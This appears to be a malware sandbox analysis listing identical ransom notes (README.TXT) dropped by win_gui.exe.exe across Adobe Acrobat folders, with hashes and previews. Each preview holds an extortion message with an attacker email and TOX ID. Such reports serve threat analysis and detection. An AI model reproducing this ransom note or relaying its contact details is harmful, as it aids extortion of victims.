                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\css\app\dev\cef\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\css\app\dev\libs\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\css\core\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\css\core\dev\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\css\core\dev\cef\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\css\core\dev\libs\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\css\files\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\css\files\dev\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\css\files\dev\cef\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\css\files\dev\libs\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\file_types\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\file_types\hi_contrast\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\file_types\themes\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\file_types\themes\dark\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\hi_contrast\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\themes\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\themes\dark\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
